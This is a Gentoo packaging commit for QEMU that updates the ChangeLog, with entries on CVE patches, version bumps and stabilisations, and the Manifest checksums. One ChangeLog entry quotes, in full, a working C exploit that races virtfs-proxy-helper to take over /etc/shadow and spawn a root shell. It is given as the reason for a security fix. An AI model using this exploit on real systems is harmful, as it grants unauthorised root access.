bump(app-emulation/qemu): sync with upstream

Nick Owens 2016-04-01 12:45:52 -07:00
parent eb5e6a6640
commit 7b807b21c7
77 changed files with 2464 additions and 4933 deletions


@ -1,5 +1,5 @@
# ChangeLog for app-emulation/qemu # ChangeLog for app-emulation/qemu
# Copyright 1999-2015 Gentoo Foundation; Distributed under the GPL v2 # Copyright 1999-2016 Gentoo Foundation; Distributed under the GPL v2
# (auto-generated from git log) # (auto-generated from git log)
*qemu-9999 (09 Aug 2015) *qemu-9999 (09 Aug 2015)
@ -239,3 +239,375 @@
qemu-9999.ebuild: qemu-9999.ebuild:
force C locale for sorting to workaround glibc bug #564936 force C locale for sorting to workaround glibc bug #564936
23 Nov 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-cflags.patch, qemu-9999.ebuild:
update cflags patch #565866
07 Dec 2015; Doug Goldstein <cardoe@gentoo.org> qemu-2.3.0-r5.ebuild,
qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild,
qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild,
qemu-9999.ebuild:
utilize xen-tools sub-slot
app-emulation/xen-tools now exposes a sub-slot to help dependencies
rebuild when necessary.
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
*qemu-2.4.1-r1 (08 Dec 2015)
08 Dec 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.1-CVE-2015-7504.patch,
+files/qemu-2.4.1-CVE-2015-7512.patch,
+files/qemu-2.4.1-CVE-2015-8345.patch, +qemu-2.4.1-r1.ebuild:
add upstream security fixes #566792 #567144
08 Dec 2015; Mike Frysinger <vapier@gentoo.org> metadata.xml,
qemu-9999.ebuild:
add USE=virgl for Virgil 3d GPU #566994
08 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
switch to new libcacard release #561814
*qemu-2.4.0.1-r2 (14 Dec 2015)
*qemu-2.4.0-r2 (14 Dec 2015)
*qemu-2.3.1-r1 (14 Dec 2015)
*qemu-2.3.0-r7 (14 Dec 2015)
14 Dec 2015; Jason A. Donenfeld <zx2c4@gentoo.org> +qemu-2.3.0-r7.ebuild,
+qemu-2.3.1-r1.ebuild, +qemu-2.4.0-r2.ebuild, +qemu-2.4.0.1-r2.ebuild:
critical security fix
The virtfs-proxy-helper program is not a safe binary to give caps.
The following exploit code demonstrates the vulnerability:
~=~=~=~= snip ~=~=~=~=
/* == virtfshell ==
*
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
* virtfs-proxy-helper makes some sort of flimsy check to make sure
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
*
* This should spawn a root shell eventually on vulnerable systems.
*
* - zx2c4
* 2015-12-12
*
*
* zx2c4@thinkpad ~ $ lsb_release -i
* Distributor ID: Gentoo
* zx2c4@thinkpad ~ $ ./virtfshell
* == Virtfshell - by zx2c4 ==
* [+] Beginning race loop
* [+] Chown'd /etc/shadow, elevating to root
* [+] Cleaning up
* [+] Spawning root shell
* thinkpad zx2c4 # whoami
* root
*
*/
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", &sbuf);
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];
sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());
printf("== Virtfshell - by zx2c4 ==\n");
printf("[+] Beginning race loop\n");
while (!it_worked()) {
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper",
"-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock",
NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}
printf("[+] Chown'd /etc/shadow, elevating to root\n");
system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root::::::::/' /etc/shadow >
/tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
" echo [+] Cleaning up;"
" cat /tmp/original_shadow > /etc/shadow;"
" chown root:root /etc/shadow;"
" rm /tmp/modified_shadow /tmp/original_shadow;"
" echo [+] Spawning root shell;"
" exec /bin/bash -i"
"'");
return 0;
}
15 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.3.0-r5.ebuild,
qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild,
qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild,
qemu-2.4.1-r1.ebuild, qemu-9999.ebuild:
drop virtfs-proxy-helper fcaps from all versions #568226
*qemu-2.4.1-r2 (15 Dec 2015)
15 Dec 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.1-CVE-2015-7549.patch,
+files/qemu-2.4.1-CVE-2015-8504.patch, +qemu-2.4.1-r2.ebuild:
add upstream fixes for #567828 #568214
16 Dec 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.1-r2.ebuild:
amd64 stable wrt bug #567828
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
16 Dec 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.1-r2.ebuild:
x86 stable wrt bug #567828
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
*qemu-2.5.0 (17 Dec 2015)
17 Dec 2015; Mike Frysinger <vapier@gentoo.org> +qemu-2.5.0.ebuild:
version bump to 2.5.0
17 Dec 2015; Mike Frysinger <vapier@gentoo.org>
-files/qemu-2.2.1-CVE-2015-1779-1.patch,
-files/qemu-2.2.1-CVE-2015-1779-2.patch,
-files/qemu-2.3.0-CVE-2015-3209.patch,
-files/qemu-2.3.0-CVE-2015-3214.patch,
-files/qemu-2.3.0-CVE-2015-3456.patch,
-files/qemu-2.3.0-CVE-2015-5154-1.patch,
-files/qemu-2.3.0-CVE-2015-5154-2.patch,
-files/qemu-2.3.0-CVE-2015-5154-3.patch,
-files/qemu-2.3.0-CVE-2015-5158.patch,
-files/qemu-2.3.0-CVE-2015-5165-1.patch,
-files/qemu-2.3.0-CVE-2015-5165-2.patch,
-files/qemu-2.3.0-CVE-2015-5165-3.patch,
-files/qemu-2.3.0-CVE-2015-5165-4.patch,
-files/qemu-2.3.0-CVE-2015-5165-5.patch,
-files/qemu-2.3.0-CVE-2015-5165-6.patch,
-files/qemu-2.3.0-CVE-2015-5165-7.patch,
-files/qemu-2.3.0-CVE-2015-5166.patch,
-files/qemu-2.3.0-virtio-serial.patch,
-files/qemu-2.4.0-CVE-2015-5225.patch,
-files/qemu-2.4.0-CVE-2015-6855.patch,
-files/qemu-2.4.0-CVE-2015-7295-1.patch,
-files/qemu-2.4.0-CVE-2015-7295-2.patch,
-files/qemu-2.4.0-CVE-2015-7295-3.patch,
-files/qemu-2.4.0-block-mirror-crash.patch,
-files/qemu-2.4.0-e1000-loop.patch, -qemu-2.3.0-r5.ebuild,
-qemu-2.3.0-r6.ebuild, -qemu-2.3.0-r7.ebuild, -qemu-2.3.1.ebuild,
-qemu-2.3.1-r1.ebuild, -qemu-2.4.0-r1.ebuild, -qemu-2.4.0-r2.ebuild,
-qemu-2.4.0.1.ebuild, -qemu-2.4.0.1-r1.ebuild, -qemu-2.4.0.1-r2.ebuild,
-qemu-2.4.1.ebuild, -qemu-2.4.1-r1.ebuild:
drop versions <2.4.1-r2
20 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0.ebuild,
qemu-9999.ebuild:
disable libgcrypt usage #568856
*qemu-2.5.0-r1 (18 Jan 2016)
18 Jan 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-CVE-2015-8558.patch,
+files/qemu-2.5.0-CVE-2015-8567.patch,
+files/qemu-2.5.0-CVE-2015-8701.patch,
+files/qemu-2.5.0-CVE-2015-8743.patch,
+files/qemu-2.5.0-CVE-2016-1568.patch, +qemu-2.5.0-r1.ebuild:
add upstream fixes for #567868 #568246 #570110 #570988 #571566
24 Jan 2016; Michał Górny <mgorny@gentoo.org> metadata.xml:
Replace all herds with appropriate projects (GLEP 67)
Replace all uses of herd with appropriate project maintainers, or no
maintainers in case of herds requested to be disbanded.
24 Jan 2016; Michał Górny <mgorny@gentoo.org> metadata.xml:
Set appropriate maintainer types in metadata.xml (GLEP 67)
26 Jan 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r1.ebuild:
amd64 stable wrt bug #571566
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
26 Jan 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r1.ebuild:
x86 stable wrt bug #571566
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
15 Feb 2016; Doug Goldstein <cardoe@gentoo.org>
-files/qemu-1.7.0-cflags.patch, -files/qemu-2.4-mips-fix-mtc0.patch,
-files/qemu-2.4-mips-fix-rdhwr.patch,
-files/qemu-2.4-mips-move-interrupts-new-func.patch,
-files/qemu-2.4-mips-wake-up-on-irq.patch,
-files/qemu-2.4.1-CVE-2015-7504.patch,
-files/qemu-2.4.1-CVE-2015-7512.patch,
-files/qemu-2.4.1-CVE-2015-7549.patch,
-files/qemu-2.4.1-CVE-2015-8345.patch,
-files/qemu-2.4.1-CVE-2015-8504.patch, -qemu-2.4.1-r2.ebuild,
-qemu-2.5.0.ebuild:
remove vulnerable versions
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
15 Feb 2016; Patrick Lauer <patrick@gentoo.org> metadata.xml:
Remove unneeded useflag description from metadata.xml
Package-Manager: portage-2.2.27
19 Feb 2016; Robin H. Johnson <robbat2@gentoo.org> metadata.xml:
restore USE=gnutls use desc for side-effects
commit ea4d1e1fcc just removed the USE=tls, rather than updating it for
USE=gnutls. Per the description, it has side-effects of enabling
enabling WebSocket & disk quorum features.
Package-Manager: portage-2.2.27
28 Feb 2016; Doug Goldstein <cardoe@gentoo.org> qemu-2.5.0-r1.ebuild:
fix arm64 dependencies
arm/arm64 have some dependencies which are higher than other platforms.
Unfortunately the dependencies are not stable on arm but this package is
so arm updates will come later.
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
28 Feb 2016; Matthew Thode <prometheanfire@gentoo.org> qemu-2.5.0-r1.ebuild:
keywording arm64
merged on X-C1
Package-Manager: portage-2.2.26
15 Mar 2016; Doug Goldstein <cardoe@gentoo.org> qemu-2.5.0-r1.ebuild:
fix arm depends for libseccomp
arm needs libseccomp 2.2.3 or newer for QEMU to be able to utilize it.
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
*qemu-2.5.0-r2 (23 Mar 2016)
23 Mar 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-CVE-2015-8613.patch,
+files/qemu-2.5.0-CVE-2015-8619.patch,
+files/qemu-2.5.0-CVE-2016-1714.patch,
+files/qemu-2.5.0-CVE-2016-1922.patch,
+files/qemu-2.5.0-CVE-2016-1981.patch,
+files/qemu-2.5.0-CVE-2016-2197.patch,
+files/qemu-2.5.0-CVE-2016-2198.patch,
+files/qemu-2.5.0-CVE-2016-2392.patch,
+files/qemu-2.5.0-rng-stack-corrupt-0.patch,
+files/qemu-2.5.0-rng-stack-corrupt-1.patch,
+files/qemu-2.5.0-rng-stack-corrupt-2.patch,
+files/qemu-2.5.0-rng-stack-corrupt-3.patch,
+files/qemu-2.5.0-sysmacros.patch, +files/qemu-2.5.0-usb-ehci-oob.patch,
+files/qemu-2.5.0-usb-ndis-int-overflow.patch, +qemu-2.5.0-r2.ebuild:
backport various upstream fixes
24 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r2.ebuild:
amd64 stable wrt bug #578044
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
24 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r2.ebuild:
x86 stable wrt bug #578044
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
25 Mar 2016; Sergey Popov <pinkbyte@gentoo.org> -qemu-2.5.0-r1.ebuild:
security cleanup
Gentoo-Bug: 576420
Package-Manager: portage-2.2.28
28 Mar 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0-r2.ebuild,
qemu-9999.ebuild:
use l10n.eclass to respect LINGUAS #577814
*qemu-2.5.0-r3 (28 Mar 2016)
28 Mar 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-9pfs-segfault.patch,
+files/qemu-2.5.0-ne2000-reg-check.patch, +qemu-2.5.0-r3.ebuild:
add few more upstream fixes #573816 #578142
29 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r3.ebuild:
amd64 stable wrt bug #573816
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
29 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r3.ebuild:
x86 stable wrt bug #573816
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
20 Apr 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0-r3.ebuild,
qemu-9999.ebuild:
mention /dev/kvm perm updates in the readme/elog #580436
*qemu-2.5.1 (23 Apr 2016)
23 Apr 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.1-CVE-2015-8558.patch,
+files/qemu-2.5.1-CVE-2016-4020.patch,
+files/qemu-2.5.1-stellaris_enet-overflow.patch, +qemu-2.5.1.ebuild:
app-misc/qemu: version bump & bug fixes #579614 #580040 #580426


@ -1,49 +1,38 @@
AUX 65-kvm.rules 40 SHA256 c16a8dc7855880b2651f1a3ff488ecc54d4ac1036c71fffd5007021d8d18a7c5 SHA512 98aad2a2f212a7ac0ee5b60a9c92744fa462bce5f26594845c7a31d692aaaca2d52cb57bdbede7dfc60b9862c2a6510665dbb03215d5cf76e62516a283decdd6 WHIRLPOOL 937de93a23930f6b8533f0c3e0dd249c99ddf7d54446dea857607266ac0a4b435c5b4a52b2986b138bace9c0a7ade66f94116b38e2bc4767ead54bd11baf0920 AUX 65-kvm.rules 40 SHA256 c16a8dc7855880b2651f1a3ff488ecc54d4ac1036c71fffd5007021d8d18a7c5 SHA512 98aad2a2f212a7ac0ee5b60a9c92744fa462bce5f26594845c7a31d692aaaca2d52cb57bdbede7dfc60b9862c2a6510665dbb03215d5cf76e62516a283decdd6 WHIRLPOOL 937de93a23930f6b8533f0c3e0dd249c99ddf7d54446dea857607266ac0a4b435c5b4a52b2986b138bace9c0a7ade66f94116b38e2bc4767ead54bd11baf0920
AUX bridge.conf 454 SHA256 a51850dd39923f3482e4c575b48ad9fef9c9ebb2f2176225da399b79ce48c69d SHA512 a907ee86b81a1b61033bb7621ded65112504131ef7b698c53e4014b958ee6fc79e66f63069015a01e41362cb70a7d0ed26dd9a03033cf776f4846f0e1f8f1533 WHIRLPOOL 8fcbd4abf9b8f7ca3d16fe0eaf17196ebf708dfecf85ce0f020e0de22b64905114f7b310f361826c81bb961c6b1bbbf984bff1e595bb949993b8966ccb222c35 AUX bridge.conf 454 SHA256 a51850dd39923f3482e4c575b48ad9fef9c9ebb2f2176225da399b79ce48c69d SHA512 a907ee86b81a1b61033bb7621ded65112504131ef7b698c53e4014b958ee6fc79e66f63069015a01e41362cb70a7d0ed26dd9a03033cf776f4846f0e1f8f1533 WHIRLPOOL 8fcbd4abf9b8f7ca3d16fe0eaf17196ebf708dfecf85ce0f020e0de22b64905114f7b310f361826c81bb961c6b1bbbf984bff1e595bb949993b8966ccb222c35
AUX qemu-1.7.0-cflags.patch 300 SHA256 8f35e55c4bae93e82f9580eabe2d6a2d4660bd05343e1f4e6c33815deeede91e SHA512 54446cb555b623b2306f8a323713e4dfb1b8b7bbf3af3771d5b62e164e0672cc21cbe44f08ca8b58052523e8d629e16355a44ebb544a999a44d11ac3af671f1c WHIRLPOOL b903b4abefeeb09a2ab2d1ee224de5d3694f99f50aacfe33882fce0c1c87c23dae4d57b001d1c35cc96fffa93d43fac4a8ab30a3e45fe1f380580162c0332e78 AUX qemu-2.5.0-9pfs-segfault.patch 1294 SHA256 707835ed8af1aa7e8fc9f0e06c6afa8e77fe7858b20ad4c2df2a1aec0627332d SHA512 2af7498939ba653c36808a7bccafe4a3d8c3d1cfa7199c5788f67fb001925dff17e4faba5e13c6b1517ca887209452f4ba7ed71f6b4464d55b5e942350406f90 WHIRLPOOL 591ba85bd9e5ab0665ed5835878886ec0d774a500ed966dd1b37e5478a4799a38d319a6bb88d214f202a83282db6a0434641b30c8b70ceef6bd2fb1e38f8faef
AUX qemu-2.2.1-CVE-2015-1779-1.patch 8631 SHA256 17ea04bb0571f3a346eb25ce2d61fd7053515767adedfde567fd39205993c600 SHA512 191dde0754b9466d87cf99a578ac07f0902f373156f4d5ff98540b9099a6fa8e29ba4ca9d4a5a21ae5dbba2b80c36600ea0bd2c31fa0c8734926514015166ab8 WHIRLPOOL 2be2f490eb32857b2b218761df3580bc31eb5a89bf1b289a048e9fd489cdb024869399481345b5ecb09a45c4fbf1ee4639062ae1fdbee9781e66ca6cc8af4cac AUX qemu-2.5.0-CVE-2015-8558.patch 1459 SHA256 d769e6eb6dc0bdb0b982ef5fe7d73cc6bad47233102f53d11c6ed6c9051602d8 SHA512 42961191890c500675610d5d33e6ff468b07428c6b428ac01bb5c0e3ea88ff611a3532f848d54317458475fef221a06e41761ef14ea61d1b741db73450c4f90d WHIRLPOOL 475679dc1a24bc75012995a9a2122847454701b65ff0b7f8192865b45de49ce08572f129a7cfdeb36521252ed2f80c95e9dddbd64cb8e39fdc5beacc25934798
AUX qemu-2.2.1-CVE-2015-1779-2.patch 2318 SHA256 4c0966520bf09df25d99c883f94037e765406dd4097dd704e66361bb07f73679 SHA512 7a85bc8e00c60c6c36790d1169f0d84d2c75fe81c1700b4f764ddcb0d0587d4b6d228d80e65fead035e3ab99449aad2f559071edf9145ff7a755506f3ff05b0e WHIRLPOOL 078388c50367d41c810a02aa795b6ad0df381582bdd2725ae125243ee5921aa4057494f063a7de49da6b6f6343f37a3c83d96ef6d92c22e722972c8e4ea968dc AUX qemu-2.5.0-CVE-2015-8567.patch 3108 SHA256 88b72df4e02407c3b9ca4835c38988b97fcd5aa9c68da6fa47207fe675d4e661 SHA512 2f0243ec9764d72fe5e7a005a8db40d3d5c4c2edae5c3451087ee3f5c841c96a3112875cf88a19061fa2ce0d04715d247e6eb1eb83e1e5b57ec0b9eb324b8ce6 WHIRLPOOL b432ff3e105da5c0bd20dd1d7da0374f4005b2ac5a9a8c824e96730aeafa89bb8fc125f8b2857fdaf72024082ddbc0c7a28c3e3ffb9114c3d370db1b638c4731
AUX qemu-2.3.0-CVE-2015-3209.patch 1759 SHA256 0fd6be98beb1f63cd45924c1cdf2a64fc5dca2af5a977c6391aa656433a035e9 SHA512 9ddca8a536f14ecf9f5e15fc65438cce2e02adf92c54cb98f4529934515b0cc159bb41532013d6321590812181f9904d4d8bb761542dc776ff8a724a97bb6f0f WHIRLPOOL f365aab8ed12602c32db7e2c4203d58e4d07dd147d4e2356b92f4124b63fb5f17b0314fc6520c3b7a40786205b671c40ba3fbc4b7e16f8be5e9399bdd5532508 AUX qemu-2.5.0-CVE-2015-8613.patch 1264 SHA256 c8df9bb4c0100ef6c8ae09acd73878e46b3ad4a9e04b9cfe30445922bc33299c SHA512 ea2bf909ec29bab0b2131bf9d3e8fc04f176393258c4ce578d3ac8d76f09a25b96f8a3b2aa450b47c0ba9bc9637e5b93e7cc53542362b48930de18ceebb07698 WHIRLPOOL f0d415b1df9f05cb0431801054535f8939d46e7dda6eaa5ce990eef82ddc458003eb9ae5dc06e3269ddb5ed8f8c903c1f3d058d41e63ea9a5192b6149283feb2
AUX qemu-2.3.0-CVE-2015-3214.patch 1411 SHA256 c0d3f6e17d8b68260486f478dea18fb7869fe4108551fd9093d89be57e2ec360 SHA512 97030b47df828a7377d20a30b29b80c580e3f9b8cfd6632c27637154b6877b27730780cd716ab96f058f1eccaa848c6808959ab8b4949d9cc7440d9e58c78fd5 WHIRLPOOL 7717aaf2e5a468c4b2ba34adee56394aea676d7a7d472fd37e3a6096ef74d2db696d3f5bc7c45cb2879ec4ec4fd2255555ea2ee348b5cd64a80b6c7af6ffdcd8 AUX qemu-2.5.0-CVE-2015-8619.patch 4220 SHA256 325bb3df340a1f5115a345a145bed94e9b2d5721cf8cce1217138e8d5a8a0c1a SHA512 317e882da18332fe667c10c55b8f026d347d93c61f668e8ddb916f1b0f5e39a9e3104c14ab2306ce761024a02a78af3a4808627ad9f18c0d43d748fd30c21505 WHIRLPOOL feddd255cf3844cd270ca2662f6140cc7104f8328e51acb01dc2f6f1b4646061569f5faa629264ebeaa5a2b18e595c4a90b69a588aa05f1acf70d9570067c6c0
AUX qemu-2.3.0-CVE-2015-3456.patch 2853 SHA256 efac61bf9c20d5d08ef47bc9d51be5c8bd519f1d970ba3c3506c5760bf807e7d SHA512 5fed59ae67a962d187418f4bd57cebe901f9bcba817694b5e2a57daf77c34a406ed7c1f278e12d813304e58c48a24493b4e001a9ee4045bab2608f1730715ac7 WHIRLPOOL 9ad5237aa1bbe46a8493e331bb9c2152c36f9c877582485e1cf811b09430bad97a9f3b6bc52face7e4287f9c9fe4f1891de154a62ba93ea454c3ed9d44e8f729 AUX qemu-2.5.0-CVE-2015-8701.patch 1671 SHA256 f39e0c6301cffa1b14c3ef0ab72fce0e2acd42170759ef7954234d31602aeb99 SHA512 d39edf84e2d17e6080bbc4a270732cd73b41fa39d948ee7bc4456e1024c5a69ddfb5e848af3272615f5aa36a3b6410a12f5a73e00ccfa58e0d60d7289d034aa9 WHIRLPOOL 352148c367837ba2d6eb5eb39e00c128f0cff3faef159754a41318857bc11a6616be184c24df4767ec2c8c14910ad74fc3be48273f6312b1687910fbcaf7bec3
AUX qemu-2.3.0-CVE-2015-5154-1.patch 2160 SHA256 3dd3758c0bd8f27a906f2234ecfe270596e48d5c056eab2390b1eab9b610a847 SHA512 63d70d9904922be7f709c0638214ab42ae167b4dd05c0ac35a6de6dbdf81013769ed8733a8f56ce1e108d0759cf485f2199d63b046b526c5a0cec19a41fe41a9 WHIRLPOOL 238d9030c0d0970d22479ca0e1432819785ba1d4961e4d47fcfb63cf9b8a8cff92878509210fd10f3a91d6108f85ed172829234316862016d07533b71da954d2 AUX qemu-2.5.0-CVE-2015-8743.patch 1777 SHA256 22aac571c1aa6f6a283d200a7703fdfea0a5bcaf227a003a2cbf5741bbb8df85 SHA512 65d8632fd43959983ca02f9ab116ec78ea043e6d867e6d743014885c2a423bb3b87c2e56caa37e7f29e971a44f5ea695cb4ce1c3a9c1fc2d734b25ca0b2f4054 WHIRLPOOL 9128c812cfbfe3d4629cd6c7c2c6f50c9ef2fe2d5b62b24486559279296987f593f852f913eb67fbe956d650d50612fa7a658a60b3d80cf4fa9256e332d77330
AUX qemu-2.3.0-CVE-2015-5154-2.patch 817 SHA256 4a3e812dec9bd43d2de2dd88f0adbb2473b785e6a1c3841d889dffad13a65f7a SHA512 0a903ad1e8fb1cac59f26e63d05820cb13cc020ba606a265c0482f1103a737ce0de9cc913ca324422cdda0ebf2b056e20b50951de999325b555031c014eaa597 WHIRLPOOL d697f46bf34e05f98db9e2e3ac05807afec59db5aa4063c76a0171efc4c84073301cec048f75398e210eec698be5d0363cb9c7c36a555cee9616acd21f09446b AUX qemu-2.5.0-CVE-2016-1568.patch 1476 SHA256 ba2a25142977eea531159d81ef8938e8519c92800aa1958e71da9e2780c8256a SHA512 643ef742e6cd1dbc8f420b38f684bc8639e4bd58ab38c254654d4b1a72b129202fecdddddfd308b48ed7813da193edff68d737080d5035c82daf9676ee17df22 WHIRLPOOL af9376400540f20d77ea06cb6a12ce415b72bb22cdde3365bba8b02deb8985aedfee303646e13e1d1263a2dcd17bf1518637183a81c66c2db7b438aa88ef7d95
AUX qemu-2.3.0-CVE-2015-5154-3.patch 2101 SHA256 17999d2e455db848b3e47d146f239104e2e58661f27fc549609bdf6ef77ad8a5 SHA512 0a12a2281b8f6ae787ff8d58437b68df877d02d0ff3d53491a0dbea8c2e656632242de5b2e56b2703f77bfd2b8987c7f312025e27fd8bbb14f159419322d9801 WHIRLPOOL b05f6828dd66b26fad3327c0e795b211f50733857dbf3ac909900321df2cd381fb536c6418510796bafcd38795c7b8ae0729aa51666eaccd0787029987b30e19 AUX qemu-2.5.0-CVE-2016-1714.patch 2168 SHA256 2a366b01f5c05a87324ca765cea90bc93eda819d264932ac4588e6303e0b7dee SHA512 25f5f67dbcb2175bac1b5d6d11bf6b27019526c0ee43ed8580a0de10bf82ac62e5a71ded4d18c0e561d8d3832da630c92f9f118277da349367f55b4939029216 WHIRLPOOL 600d0c90779aaf7c1840e106359c909d486c7cce483edc0e5ddc627a127c907f5dd9cbd5b8ce561e2675f6bfe8cd0502efa96557601ce26eda2311b1072ab48b
AUX qemu-2.3.0-CVE-2015-5158.patch 1302 SHA256 d53b76179ba33a51fbb1b7b2c35b003c63968d0400419c10fa33d353247eccd3 SHA512 8ef6f640ae77d9769fcff92b8c5a6a986ae35021556e594cf4848d1247cbf880e08f661c2734770fb946be8af17a542c3caae36b2b28e3ab58d70a829aa987c2 WHIRLPOOL 69987764ec3bd21bb316310938567a1e4e454a4195b4bede3f34487ee987777510e83cac24b455246d9cde84b16e0ac823dcb0f39e0a97c9a0db2315bc2c6f4d AUX qemu-2.5.0-CVE-2016-1922.patch 2114 SHA256 a10d23d5ff3d021aa0962c79a397b69518cec6cd570ebea771f03513d4b7eb1a SHA512 af895fd14e876f808203279176c5f5c28d95d0137385c6d0e56e27f9ad70b76552b8ce75a3be368ceed94fbc62999e8d6c5e6dbcd35e99d59c57787afe6ac57d WHIRLPOOL 199ec0c9bc766968778e5733e1ca0773999a3cccfa779d8fdf68c2ed866a1427048b0db9730eb2a1521be5e174ea6388b69053c85d0d25144e73df25ec7829a9
AUX qemu-2.3.0-CVE-2015-5165-1.patch 2926 SHA256 12d0dc1a31449288ed5e562a1e9415c437b7a2799e8afa0b251e3957a0d8ab23 SHA512 1df1ff1044542c4a0b040cb7fe5bbe002ee95782277f50f2bea86fbb34d4c5404a6c1f467a4cc224020882fe8c2f113e6b44d762129bd79ae04e139494a90ddc WHIRLPOOL 9a145915030288ab597899d18e8054e6b0c5d9f25fa78ee3e7c99317d91d68ee155f9e16363c8d8f692a97e231394c778fb5fb6c527c9419d0b4b1f79ea7c725 AUX qemu-2.5.0-CVE-2016-1981.patch 4160 SHA256 ad440f4964670e68846a3469e0cb0eca3ecf11cfc5c2e32b09581b64eef43ab7 SHA512 f133a311da42cc831116251550359949e0f23f1163a7b0e638fc5f43edf1dea17a5e5843a06142c3086ef367d94898b074eebf8c371ea83b7a3981cfd20c4e27 WHIRLPOOL ba6e563917773d4488f51c11864a6ce1a4331ba6fc7925f47768282ea75f1a26c51792063c946579d49b28e3ed7a854a191732c1ba7ec40628395e971cf67782
AUX qemu-2.3.0-CVE-2015-5165-2.patch 18212 SHA256 c91a60b7d7e18ea95b31eca0ba940d53c14730fae1e50802375c9e5ab7d0f109 SHA512 eb332382898e0450bc6a6297e5977579a05f7b2ad304659aff37a7eed040b28013a982cdff2a1d669e968cea2aefef183081db1f6f9ae2baf64865ef2dbfa283 WHIRLPOOL c95181f31e8db78432c226a51bb4023da73430ce4de96960448573d3929bdce23b696ba9a6dabc8ccb8fe18e9c07ccf73d646ddccf26b3b0761813fcdef92564 AUX qemu-2.5.0-CVE-2016-2197.patch 1358 SHA256 caa5eb42b21a3fc656982fdc4e511c8350eeb0511857d9b8f371e4e926c2ac80 SHA512 ee6467ef00c5db1e6c5f6331ec411afd139e7e8c5d5e23e3ee33b3161f0e79028ddecfa661bf4bfb5bac0cfa91385f69d66b57c5337384817f0756b7575aa099 WHIRLPOOL 67bab11771159560fd080d157477aa227aa351bb8101671c0e778a38a15d607a2346ade7b10310914f93d5a1faeb993003590e7bf75cd5c9d06db0c687085b51
